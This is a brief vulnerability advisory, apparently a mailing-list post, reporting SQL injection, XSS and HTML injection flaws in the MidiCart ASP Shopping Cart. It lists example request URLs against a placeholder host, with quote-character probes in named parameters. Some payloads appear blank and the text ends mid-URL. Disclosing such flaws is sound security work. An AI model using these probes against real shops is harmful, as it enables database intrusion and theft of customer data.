Hello All, I have discovered a number of remote vulnerabilities in: MidiCart ASP Shopping Cart, Evaluation Version 7 & Standard & Pro Authors Site: http://www.midicart.com/ +-[Examples:]--------------------------------------------------+ [1]------------------------------------------------------------+ Possible SQL Injection & Information Disclosure: http://www.victim.com/item_list.asp?maingroup='&secondgroup=CDROM http://www.victim.com/item_list.asp?maingroup=CDROM&secondgroup=' http://www.victim.com/item_show.asp?code_no=' http://www.victim.com/search_list.asp [2]------------------------------------------------------------+ XSS: http://www.victim.com/item_list.asp?maingroup=&secondgroup=CDROM http://www.victim.com/item_list.asp?maingroup=CDROM&secondgroup= [2]------------------------------------------------------------+ HTML Injection: http://www.victim.com/item_list.asp?maingroup=